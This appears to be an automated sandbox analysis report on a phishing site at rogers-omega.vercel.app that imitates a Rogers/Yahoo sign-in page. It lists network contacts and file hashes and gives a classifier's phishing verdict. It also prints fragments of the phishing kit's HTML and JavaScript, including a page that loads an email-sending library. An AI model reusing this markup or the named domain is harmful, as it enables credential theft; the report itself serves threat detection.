      truetrue
        unknown
        www.google.com
        142.250.185.132
        truefalse
          unknown
          fp2e7a.wpc.phicdn.net
          192.229.221.95
          truefalse
            unknown
            cdn.jsdelivr.net
            unknown
            unknownfalse
              unknown
              NameMaliciousAntivirus DetectionReputation
              https://rogers-omega.vercel.app/app.jstrue
                unknown
                https://rogers-omega.vercel.app/favicon.icotrue
                  unknown
                  https://rogers-omega.vercel.app/assets/rogers_bgr.jpgtrue
                    unknown
                    https://cdn.jsdelivr.net/npm/bootstrap@5.2.3/dist/css/bootstrap.min.cssfalse
                      unknown
                      https://rogers-omega.vercel.app/email.jstrue
                        unknown
                        https://rogers-omega.vercel.app/assets/rogers.pngtrue
                          unknown
                          http://rogers-omega.vercel.app/true
                            unknown
                            https://rogers-omega.vercel.app/true
                              unknown
                              https://rogers-omega.vercel.app/style.csstrue
                                unknown
                                https://cdn.jsdelivr.net/npm/@emailjs/browser@3/dist/email.min.jsfalse
                                  unknown
                                  https://cdn.jsdelivr.net/npm/bootstrap@5.2.3/dist/js/bootstrap.bundle.min.jsfalse
                                    unknown
                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://cdn.jsdelivr.net/npm/chromecache_62.2.drfalse
                                      unknown
                                      https://dashboard.emailjs.com/admin/accountchromecache_58.2.dr, chromecache_64.2.drfalse
                                        unknown
                                        https://api.emailjs.comchromecache_64.2.drfalse
                                          unknown
                                          https://github.com/twbs/bootstrap/graphs/contributors)chromecache_53.2.dr, chromecache_65.2.drfalse
                                            unknown
                                            https://www.rogers.com/chromecache_52.2.dr, chromecache_66.2.drfalse
                                              unknown
                                              https://cdn.jsdelivr.net/npm/bootstrapchromecache_62.2.drfalse
                                                unknown
                                                https://github.com/twbs/bootstrap/blob/main/LICENSE)chromecache_59.2.dr, chromecache_53.2.dr, chromecache_65.2.drfalse
                                                  unknown
                                                  https://dashboard.emailjs.com/adminchromecache_58.2.dr, chromecache_64.2.drfalse
                                                    unknown
                                                    https://dashboard.emailjs.com/admin/templateschromecache_58.2.dr, chromecache_64.2.drfalse
                                                      unknown
                                                      https://getbootstrap.com/)chromecache_59.2.dr, chromecache_53.2.dr, chromecache_65.2.drfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs
                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      76.76.21.123
                                                      rogers-omega.vercel.appUnited States
                                                      16509AMAZON-02UStrue
                                                      76.76.21.164
                                                      unknownUnited States
                                                      16509AMAZON-02USfalse
                                                      76.76.21.241
                                                      unknownUnited States
                                                      16509AMAZON-02USfalse
                                                      151.101.129.229
                                                      jsdelivr.map.fastly.netUnited States
                                                      54113FASTLYUSfalse
                                                      142.250.185.132
                                                      www.google.comUnited States
                                                      15169GOOGLEUSfalse
                                                      239.255.255.250
                                                      unknownReserved
                                                      unknownunknownfalse
                                                      IP
                                                      192.168.2.6
                                                      192.168.2.5
                                                      Joe Sandbox version:41.0.0 Charoite
                                                      Analysis ID:1522047
                                                      Start date and time:2024-09-29 07:49:34 +02:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 3m 40s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:browseurl.jbs
                                                      Sample URL:http://rogers-omega.vercel.app/
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Number of analysed new started processes analysed:6
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Detection:MAL
                                                      Classification:mal64.phis.win@17/38@12/8
                                                      EGA Information:Failed
                                                      HCA Information:
                                                      • Successful, ratio: 100%
                                                      • Number of executed functions: 0
                                                      • Number of non-executed functions: 0
                                                      • Exclude process from analysis (whitelisted): WMIADAP.exe, SIHClient.exe, svchost.exe
                                                      • Excluded IPs from analysis (whitelisted): 142.250.186.78, 142.250.185.195, 64.233.184.84, 34.104.35.123, 142.250.185.170, 142.250.186.163, 142.250.186.170, 142.250.186.106, 172.217.18.106, 172.217.16.138, 142.250.186.42, 216.58.212.170, 172.217.16.202, 142.250.186.138, 142.250.185.74, 172.217.18.10, 142.250.185.106, 216.58.206.74, 142.250.185.138, 216.58.206.42, 142.250.186.74, 20.12.23.50, 192.229.221.95, 40.69.42.241, 93.184.221.240, 20.242.39.171, 13.85.23.206, 13.85.23.86, 172.217.16.195, 20.114.59.183
                                                      • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, clientservices.googleapis.com, wu.azureedge.net, clients2.google.com, ocsp.digicert.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, update.googleapis.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, client.wns.windows.com, fonts.googleapis.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, fonts.gstatic.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, edgedl.me.gvt1.com, clients.l.google.com
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report size getting too big, too many NtSetInformationFile calls found.
                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                      • VT rate limit hit for: http://rogers-omega.vercel.app/
                                                      No simulations
                                                      InputOutput
                                                      URL: https://rogers-omega.vercel.app/ Model: jbxai
                                                      {
                                                      "brand":["Rogers",
                                                      "Yahoo"],
                                                      "contains_trigger_text":false,
                                                      "trigger_text":"",
                                                      "prominent_button_name":"Continue",
                                                      "text_input_field_labels":["Username"],
                                                      "pdf_icon_visible":false,
                                                      "has_visible_captcha":false,
                                                      "has_urgent_text":false,
                                                      "has_visible_qrcode":false}
                                                      URL: https://rogers-omega.vercel.app/ Model: jbxai
                                                      {
                                                      "phishing_score":9,
                                                      "brands":"Rogers",
                                                      "legit_domain":"rogers.com",
                                                      "classification":"wellknown",
                                                      "reasons":["The brand 'Rogers' is a well-known telecommunications company in Canada.",
                                                      "The legitimate domain for Rogers is 'rogers.com'.",
                                                      "The provided URL 'rogers-omega.vercel.app' does not match the legitimate domain.",
                                                      "The URL contains an extra word 'omega' which is suspicious and often indicative of phishing.",
                                                      "The domain 'vercel.app' is a hosting service,
                                                       which can be used by anyone to create websites,
                                                       including phishing sites."],
                                                      "brand_matches":[false],
                                                      "url_match":false,
                                                      "brand_input":"Rogers",
                                                      "input_fields":"Username"}
                                                      No context
                                                      No context
                                                      No context
                                                      No context
                                                      No context
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Unicode text, UTF-8 text
                                                      Category:downloaded
                                                      Size (bytes):5056
                                                      Entropy (8bit):4.7665082079480365
                                                      Encrypted:false
                                                      SSDEEP:96:+C82j8td7pFIptzB84eX2g7BN7SAfb5uS3oGwKQoGwKq:+C8Pd7pFIpRB8rX2eSAfwyoGw7oGwV
                                                      MD5:72DAD32D2DFCECE031BFF1406D7E80F9
                                                      SHA1:94AE34452BEAEC720983FC6125E907300EEFAB05
                                                      SHA-256:E2B68BC8E40C1524EB7196C77208C6CDD8DD1EB73C3A2B4A41EE9995B950BA5B
                                                      SHA-512:5C7E7489F43D01B3A8BD14BC935117FC565561148F700C50525B6C6B5D8C04B5855C82FC72460B54E8879F0930CFBC173BF6DC700107A096480D1F56BB498BCD
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://rogers-omega.vercel.app/app.js
                                                      Preview:let toggleClickedCount = 0;..function nextStep() {. const username = document.getElementById('username').value;. const remember = document.getElementById('remember').checked;.. if (username !== '') {. document.getElementById('step1').style.display = 'none';. document.getElementById('step2').style.display = 'block';.. // Display the username entered in the first step. document.getElementById('displayUsername').textContent = username;.. if (remember) {. // Save username in local storage or any preferred method. localStorage.setItem('username', username);. } else {. // Clear any previously stored username. localStorage.removeItem('username');. }. }.}..const togglePassword = () => {. const passwordInput = document.getElementById('password');. const toggleButton = document.querySelector('.toggle-password');. const visibilityOnIcon = toggleButton.querySelector('.visibility_on_ico
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (65299)
                                                      Category:downloaded
                                                      Size (bytes):80420
                                                      Entropy (8bit):5.182949713414269
                                                      Encrypted:false
                                                      SSDEEP:1536:p4SMTGR2t4n+3ifBHJR9WbUHk3j8YY+PwRM3CGJI9BqQM6kF:b4Fj8GPwRM3CiI9Bt8
                                                      MD5:B75AE000439862B6A97D2129C85680E8
                                                      SHA1:90D15036EF48FCB336A135BAE812B45669F19044
                                                      SHA-256:9520018FA5D81F4E4DC9D06AFB576F90CBBABA209CFCC6CB60E1464647F7890B
                                                      SHA-512:8BD7047C9C14C158843C529D0B57A7CF86511818FC610A3A401C854C5F766171E2EF0682AB27B1BD10FBE52E4D553B12893BFBACA5AA1BD639785C6646C3A7D0
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://cdn.jsdelivr.net/npm/bootstrap@5.2.3/dist/js/bootstrap.bundle.min.js
                                                      Preview:/*!. * Bootstrap v5.2.3 (https://getbootstrap.com/). * Copyright 2011-2022 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e():"function"==typeof define&&define.amd?define(e):(t="undefined"!=typeof globalThis?globalThis:t||self).bootstrap=e()}(this,(function(){"use strict";const t="transitionend",e=t=>{let e=t.getAttribute("data-bs-target");if(!e||"#"===e){let i=t.getAttribute("href");if(!i||!i.includes("#")&&!i.startsWith("."))return null;i.includes("#")&&!i.startsWith("#")&&(i=`#${i.split("#")[1]}`),e=i&&"#"!==i?i.trim():null}return e},i=t=>{const i=e(t);return i&&document.querySelector(i)?i:null},n=t=>{const i=e(t);return i?document.querySelector(i):null},s=e=>{e.dispatchEvent(new Event(t))},o=t=>!(!t||"object"!=typeof t)&&(void 0!==t.jquery&&(t=t[0]),void 0!==t.nodeType),r=t=>o(t)?t.jquer
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 504 x 96, 8-bit/color RGBA, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):14221
                                                      Entropy (8bit):7.960487745966723
                                                      Encrypted:false
                                                      SSDEEP:384:6V4w6T0yz36+dbQlOtkvHjF648a/dqSZwmJwLxW:x0yz36+d4I4HqywwwLxW
                                                      MD5:E7A19D229A7F74E2EFEECB0A171078D7
                                                      SHA1:9A109123A5E5FF74A5FB0F2DA54B2796767418B5
                                                      SHA-256:FA05AEC334D45B15B06C0E4384370920ED5A496D3A635EDD392E5BF21D45C09E
                                                      SHA-512:D34CAC924CD3D3106F49C5FF75778E80D2098AC13AD58834A80D6F9E3E1B8D67607AD0392A6DDBFB8A84C4BF9753BF0687BFFC87211D40D8A80545D83CB9370D
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://rogers-omega.vercel.app/assets/rogers.png
                                                      Preview:.PNG........IHDR.......`......j`.....sRGB........DeXIfMM.*.......i...................................................`..........6.IDATx..].`T...yo7.G6....$ !T...x..[.ZkI8......Q{Y.j.....V.x.....@.%.+....@vs.......K6...+.4.{3....~3o..o.B.%...........@@ ...........@@ ...........@@ ...........@@ ...........@@ ...........@@ .8...W..............# 9.......@@ ..........g.PP ............9f.C ........=.....Y$...........s...w.............~..0..}.........@@ ...a..c&8......@@ ..# ..~.EBA..@@ ...8G..Ep.......@.....fT8B.;.+..^.-.... >`....yv8..%...TiJ.....5A/...........@....H.q..&.....L.I........@.)....Ny8=z.....D.x7.....@@ ...."....3.a..$A)[.x]~H.x7.....@@ ....".LQ....*..=.y..w............@/!P...0J..n....7..Gm....AP.........@....Ff.P.[.&...Z..kH._..@@ ....c..'3.cl.K56....M.W.x...+.........}.....]...an.Tz......0....W ................"^}a.........@@ ..G.....a..I.Q.......y...GC.........@`.!..RWK..Y.\.../)...`.Wb,...he...%ed.o..5...M5M}II...S.;.....a....Ax.PFw0.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text
                                                      Category:downloaded
                                                      Size (bytes):9679
                                                      Entropy (8bit):5.438910167278117
                                                      Encrypted:false
                                                      SSDEEP:192:YloQTEtmSblvQMrtFS9lBQWNtjSIlUQXYtKSzLQyU3MgJN:QHaoraaD9
                                                      MD5:0D4901193E6F795A5CDB686760E924FF
                                                      SHA1:93DBFDB050207BAACA46F028EDC6A0B455D9C48F
                                                      SHA-256:99A09FDE6BED22642C9C7961BC9604185AEF6F6327A7DE2019835FB16146C9B9
                                                      SHA-512:5715CE6BF93A0155C9E2BE2628B86212CBEC81499715B6248483F545EAB93B0F61F97A46D36DBED8DFCC041DAF1BD8FBE555CCBE4E909DFAC62064B1A8FED13B
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://fonts.googleapis.com/css2?family=Montserrat:wght@400;500;700;800&family=Poppins:wght@400;500;700&display=swap
                                                      Preview:/* cyrillic-ext */.@font-face {. font-family: 'Montserrat';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/montserrat/v26/JTUSjIg1_i6t8kCHKm459WRhyzbi.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C88, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Montserrat';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/montserrat/v26/JTUSjIg1_i6t8kCHKm459W1hyzbi.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* vietnamese */.@font-face {. font-family: 'Montserrat';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/montserrat/v26/JTUSjIg1_i6t8kCHKm459WZhyzbi.woff2) format('woff2');. unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:JPEG image data, baseline, precision 8, 1440x960, components 3
                                                      Category:downloaded
                                                      Size (bytes):177323
                                                      Entropy (8bit):7.97729888326869
                                                      Encrypted:false
                                                      SSDEEP:3072:4pBt/vQo/nI981zivOBUAnydQ5KjQWoNNzpbUI8QtwFWXtCWPOG:wQo/Yvsny252QfJzCzG
                                                      MD5:C9A3247D3438DB85783B90F66CFE90DA
                                                      SHA1:3C2F5E733F02ADA6A87B469198CCD523CD91C633
                                                      SHA-256:B1CDCF41DDB0932396F2AF2665359E67ABAEC159C544520C8BFF2D58B7B6A596
                                                      SHA-512:74EEDECBF6FC249BF5BE5E817D25C8104BD3EC974F4E43A81023E5CC1205672F2AB330108A76AB89C13286C82A84AFF6919E660CB28374E5EB1642D8B896E10B
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://rogers-omega.vercel.app/assets/rogers_bgr.jpg
                                                      Preview:..................................................................................................................................................Adobe.d.........................................................................................................!1.AQ."2aq....#3B....4RTs....$br.5C....%SU.Dct.....&..6d.........................!.1.A.."Q.2a#Bq.R..3..b.$r...............?.....p.?.C.....g..$E..p..!..?$..w.........;.H......n..$?.g..7......@|..~..... h.p.......*.|..~.....(...;.H......n..$?.g..7......@|..~..... >M.d..l...&..C.6~H..p..!..?$..w.........;.H......n..$?.g..7......@|..~..... >M.d..l...&..C.6~H..p..!..?$..w........7......@|..~..... _.p..!..?$..w.........;.H.....N..~.....*...p..........u.D..m..6lXf./........*..M.d..l..U.0.?.u....$d...83JHv...o..2...h..o.Vaxw:X.....@.a.y!....Q..UN.3.kt............/..@.h?f.....M..2.W.i.......?..wtSD-...H.a.6../.7.UK.m.......!~M.../.7.@.&.~.....".|.C.4_.o..:..h......u.........:..h....@|.E.4_.o.>O.../.7.@.>..h..
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 504 x 96, 8-bit/color RGBA, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):14221
                                                      Entropy (8bit):7.960487745966723
                                                      Encrypted:false
                                                      SSDEEP:384:6V4w6T0yz36+dbQlOtkvHjF648a/dqSZwmJwLxW:x0yz36+d4I4HqywwwLxW
                                                      MD5:E7A19D229A7F74E2EFEECB0A171078D7
                                                      SHA1:9A109123A5E5FF74A5FB0F2DA54B2796767418B5
                                                      SHA-256:FA05AEC334D45B15B06C0E4384370920ED5A496D3A635EDD392E5BF21D45C09E
                                                      SHA-512:D34CAC924CD3D3106F49C5FF75778E80D2098AC13AD58834A80D6F9E3E1B8D67607AD0392A6DDBFB8A84C4BF9753BF0687BFFC87211D40D8A80545D83CB9370D
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR.......`......j`.....sRGB........DeXIfMM.*.......i...................................................`..........6.IDATx..].`T...yo7.G6....$ !T...x..[.ZkI8......Q{Y.j.....V.x.....@.%.+....@vs.......K6...+.4.{3....~3o..o.B.%...........@@ ...........@@ ...........@@ ...........@@ ...........@@ ...........@@ .8...W..............# 9.......@@ ..........g.PP ............9f.C ........=.....Y$...........s...w.............~..0..}.........@@ ...a..c&8......@@ ..# ..~.EBA..@@ ...8G..Ep.......@.....fT8B.;.+..^.-.... >`....yv8..%...TiJ.....5A/...........@....H.q..&.....L.I........@.)....Ny8=z.....D.x7.....@@ ...."....3.a..$A)[.x]~H.x7.....@@ ....".LQ....*..=.y..w............@/!P...0J..n....7..Gm....AP.........@....Ff.P.[.&...Z..kH._..@@ ....c..'3.cl.K56....M.W.x...+.........}.....]...an.Tz......0....W ................"^}a.........@@ ..G.....a..I.Q.......y...GC.........@`.!..RWK..Y.\.../)...`.Wb,...he...%ed.o..5...M5M}II...S.;.....a....Ax.PFw0.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (2058), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):2058
                                                      Entropy (8bit):5.2275519102374925
                                                      Encrypted:false
                                                      SSDEEP:48:I54twbMVLUwxlRiCXloJpA+D+F0N+4+DSnm7DGl46YXkgs2:I5nb+YaHP1oJC+iF0J+enm7I43X42
                                                      MD5:AAF4B4C066039688024B3EB28B99260D
                                                      SHA1:3D7499D713898A2798F449D8B3528D4094475208
                                                      SHA-256:249F5139F01396E20B067FBE6DB17315981FB1C36C64D64DF224BCF0F8750EAB
                                                      SHA-512:9BF344AC90C909CB03955757565B9E442BDC411BDF90303C894FB571005F9C1ED211852BCA4503BE8B59C1F2980B2D94B6E511690DB475A51AD7672FB05E22DC
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://cdn.jsdelivr.net/npm/@emailjs/browser@3/dist/email.min.js
                                                      Preview:(()=>{"use strict";var e={d:(t,r)=>{for(var i in r)e.o(r,i)&&!e.o(t,i)&&Object.defineProperty(t,i,{enumerable:!0,get:r[i]})},o:(e,t)=>Object.prototype.hasOwnProperty.call(e,t),r:e=>{"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})}},t={};e.r(t),e.d(t,{default:()=>l,init:()=>i,send:()=>a,sendForm:()=>d});const r={_origin:"https://api.emailjs.com"},i=function(e){let t=arguments.length>1&&void 0!==arguments[1]?arguments[1]:"https://api.emailjs.com";r._userID=e,r._origin=t},s=(e,t,r)=>{if(!e)throw"The public key is required. Visit https://dashboard.emailjs.com/admin/account";if(!t)throw"The service ID is required. Visit https://dashboard.emailjs.com/admin";if(!r)throw"The template ID is required. Visit https://dashboard.emailjs.com/admin/templates";return!0};class o{constructor(e){this.status=e?e.status:0,this.text=e?e.responseText:"Network Error"}}const n=function(e,t){let i=argume
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Unicode text, UTF-8 text, with very long lines (65305)
                                                      Category:downloaded
                                                      Size (bytes):194901
                                                      Entropy (8bit):5.014294143940012
                                                      Encrypted:false
                                                      SSDEEP:1536:ZtGg9JfWgeQK5wlP72qgOfI3N9LsqkVkpz600I4lp:ZtGg9JfWD9kVkpz600I4lp
                                                      MD5:3F30C2C47D7D23C7A994DB0C862D45A5
                                                      SHA1:7791DD1F3173A0D62CC39C21D2AD71FC8DAD0E72
                                                      SHA-256:C0BCF7898FDC3B87BABCA678CD19A8E3EF570E931C80A3AFBFFCC453738C951A
                                                      SHA-512:49B891FDEBACA612A8315557CAC4CA1BFED5B1E5A28BE63715D1EBB741292A0A53A1979E9A1A8779978B58B849BADCFFDAEB76570D6E4048F631B445F9354150
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://cdn.jsdelivr.net/npm/bootstrap@5.2.3/dist/css/bootstrap.min.css
                                                      Preview:@charset "UTF-8";/*!. * Bootstrap v5.2.3 (https://getbootstrap.com/). * Copyright 2011-2022 The Bootstrap Authors. * Copyright 2011-2022 Twitter, Inc.. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE). */:root{--bs-blue:#0d6efd;--bs-indigo:#6610f2;--bs-purple:#6f42c1;--bs-pink:#d63384;--bs-red:#dc3545;--bs-orange:#fd7e14;--bs-yellow:#ffc107;--bs-green:#198754;--bs-teal:#20c997;--bs-cyan:#0dcaf0;--bs-black:#000;--bs-white:#fff;--bs-gray:#6c757d;--bs-gray-dark:#343a40;--bs-gray-100:#f8f9fa;--bs-gray-200:#e9ecef;--bs-gray-300:#dee2e6;--bs-gray-400:#ced4da;--bs-gray-500:#adb5bd;--bs-gray-600:#6c757d;--bs-gray-700:#495057;--bs-gray-800:#343a40;--bs-gray-900:#212529;--bs-primary:#0d6efd;--bs-secondary:#6c757d;--bs-success:#198754;--bs-info:#0dcaf0;--bs-warning:#ffc107;--bs-danger:#dc3545;--bs-light:#f8f9fa;--bs-dark:#212529;--bs-primary-rgb:13,110,253;--bs-secondary-rgb:108,117,125;--bs-success-rgb:25,135,84;--bs-info-rgb:13,202,240;--bs-warning-rgb:255,193,7;--bs-
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text
                                                      Category:downloaded
                                                      Size (bytes):5812
                                                      Entropy (8bit):4.873329504348351
                                                      Encrypted:false
                                                      SSDEEP:96:/ytHtd4IoRn8v47bl8+P094ur6OWOIFLFy1+Ptdk:8Nd4Iolq47bl8+P094q6OWOIFLFyEk
                                                      MD5:45034A5D0C561A2EE640EA9AB4FB2C24
                                                      SHA1:B314A80FA89F48680419EA3152D3562CD1A62779
                                                      SHA-256:CC140F9BDF96E12D11533D2D3A3CF3B4C5B39BC35DC2A2E3936161B511FB882F
                                                      SHA-512:8436BA048CB6A37BD1EC75724291E4FE5041557FB798F520634480A486DCBCA4E23CF31A00E99450A76CA510216ECA2E24A49C76C28468B1AB2B9F1FF392F9C0
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://rogers-omega.vercel.app/style.css
                                                      Preview:@import url('https://fonts.googleapis.com/css2?family=Montserrat:wght@400;500;700;800&family=Poppins:wght@400;500;700&display=swap');..* {. margin: 0;. padding: 0 !important;. overflow-x: hidden;. font-family: 'Montserrat', sans-serif;.}..body {. margin: 0;. padding: 0 !important;. min-height: 100vh;. width: 100%;. background-color: #FFFFFF;. font-family: 'Montserrat', sans-serif;.}...my_card_container {. display: flex;. height: 100%;.}...my_card {. width: 100%;. background-color: #FAFAFA !important;. padding: 50px 10px !important;. border-radius: 0 !important;. margin: auto;. overflow: hidden;.}...my_card_col {. width: 90%;. margin: auto;.}...my_card_header {. display: flex;. flex-direction: row !important;. justify-content: space-between;. height: 40px;. position: relative;.}...card_logo_img {. width: 80px;.}...change_lang {. z-index: 0;.}...lang_btn {. background-color: transparent;. border: none;
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Web Open Font Format (Version 2), TrueType, length 7884, version 1.0
                                                      Category:downloaded
                                                      Size (bytes):7884
                                                      Entropy (8bit):7.971946419873228
                                                      Encrypted:false
                                                      SSDEEP:192:xLFDbKO9E3rS3JWBRO/J601FSS5ZUbik3Zy2f0:pd9J5W501otlI
                                                      MD5:9212F6F9860F9FC6C69B02FEDF6DB8C3
                                                      SHA1:AC6D71B4D5FDD2B3DABC9A06FF6C001E4251DA0B
                                                      SHA-256:7D93459D86585BFCDBB7E0376056226ADB25821EE54B96236FE2123E9560929F
                                                      SHA-512:67317495F4B53E20A9F31C034E456E6C37F387DFFB2C092CAA5159BC441CFCADD02749FFE5BBED1D580D5300A59E48A767EF2C6D9978B474F84C1A2CD095C126
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://fonts.gstatic.com/s/poppins/v21/pxiEyp8kv8JHgFVrJJfecg.woff2
                                                      Preview:wOF2..............?....x.............................`..T..L.6..6..6.$..h. ..\....~2.".8. .w.Q.Y,.?$pC.....)bT(i..@X.m...+...D.Q.O.\-?g.U..Z..._...l..!.lKD.Q..>.9v..V..<...Td$.E..,...o..c.t....!...#..8.A..3..cx~n=Di#....U......K.5jXH.].....j.(.6..]{..IDhZ.......R.....[..X".B~.(Su2..../.I.E...T.l%....'.N.aN.2\,7*0.....V.RQ..k~..".1. Lg.zd....}.yyys&D.K.g....)..*..2&%$.nm.\.._.e.tU..I.w;W.|..6..XUv...!......>@.V..'..`.H`...5.7.X.?..@#..:..<.R.|.;K..}.6..IA.C.....z.n.G............[.....z........`.X....D..{<..j...).......FQ..T..m.&s_k[%ZILV.8.l.o.z$.)/]......}..Kg.}..O...o|..>.,U..?..{b<........._.._.06.........R01.@..[......a8..7.V%..B.0F...4 ....q..u#.lg....x....a.=w...8..A6.>f.+.8..Xm@`.m....G.....i..^R}9.aB...?._#.[f.d,V....bG.]...iED.@[.:.....P...........~.{,.x...~.!...C....b.....ze..).:+N....2sd..s..MEp.?^[.k........p..nz...[-.XI.%.."..`..<.2b\.w.VS.a.+......~..J..uGq..)..1...4o3v.Sb......5.w7...-....Wd>..B....R^.4'..B.2G>.en.q..._.@s......
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:HTML document, ASCII text
                                                      Category:downloaded
                                                      Size (bytes):5265
                                                      Entropy (8bit):3.757974697422397
                                                      Encrypted:false
                                                      SSDEEP:48:WgL2XiDzmDMV3wKSFBRICzKdHO5oZQF+1BE7SANgM:hL2Xi3mk3wKSFBGCzKO3+1BE2VM
                                                      MD5:E3FE736979B22A96C43BE6AB7827A23A
                                                      SHA1:B5EBEB289FAF6E9C74B3DE1AAAFF3BED5DC253CB
                                                      SHA-256:3E96FEA89655541009C530A20BC62D1A371660AF37DF87E1E228A5D23345E2FC
                                                      SHA-512:9DA5C5AF63F2E366DD23775485DDF01949058E01A47B9924315047791D1CC591B2CACD1F5D0B229E3D9711AE2E87C4AF761D86313856AE51B88B756F8C896EDC
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://rogers-omega.vercel.app/
                                                      Preview:<!DOCTYPE html>.<html lang="en">..<head>. <meta charset="UTF-8">. <meta name="viewport" content="width=device-width, initial-scale=1.0">. <link rel="stylesheet" href="style.css">. <link rel="stylesheet". href="https://fonts.googleapis.com/css2?family=Material+Symbols+Outlined:opsz,wght,FILL,GRAD@48,400,0,0" />. <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.3/dist/css/bootstrap.min.css" rel="stylesheet". integrity="sha384-rbsA2VBKQhggwzxH7pPCaAqO46MgnOM80zW1RWuH61DGLwZJEdK2Kadq2F9CUG65" crossorigin="anonymous">. <script type="text/javascript" src="https://cdn.jsdelivr.net/npm/@emailjs/browser@3/dist/email.min.js">. </script>. <script src="./email.js"></script>. <title>Sign in with your Yahoo Rogers credentials</title>.</head>..<body>. <div class="my_card_container">. <div class="my_card">. <div class="my_card_col">. <div class="my_card_header">. <div class="my_card_logo">.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text
                                                      Category:downloaded
                                                      Size (bytes):39
                                                      Entropy (8bit):4.31426624499232
                                                      Encrypted:false
                                                      SSDEEP:3:ErAbcBxYAFDJvzqxgl:1wBxYA7vzqxg
                                                      MD5:D4AC7F1BBA70BA87C56E6D93092B7CCA
                                                      SHA1:96492A95A7F9153EED58A3598C4CCE56EDC6F8D1
                                                      SHA-256:91218093A08027E8F69C8051F9DEEF1FE6C22B278B3F6BDF761E7587CB272774
                                                      SHA-512:AFDE5B08290C83B95037CACE1B4625457690C824E21615A01413CE8A1040F8C86CD6ABD873DDD57D31C053F835C0F05EB5CDA2B102A17EF558240E73A1AFD1F4
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://rogers-omega.vercel.app/favicon.ico
                                                      Preview:The page could not be found..NOT_FOUND.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (2058), with no line terminators
                                                      Category:dropped
                                                      Size (bytes):2058
                                                      Entropy (8bit):5.2275519102374925
                                                      Encrypted:false
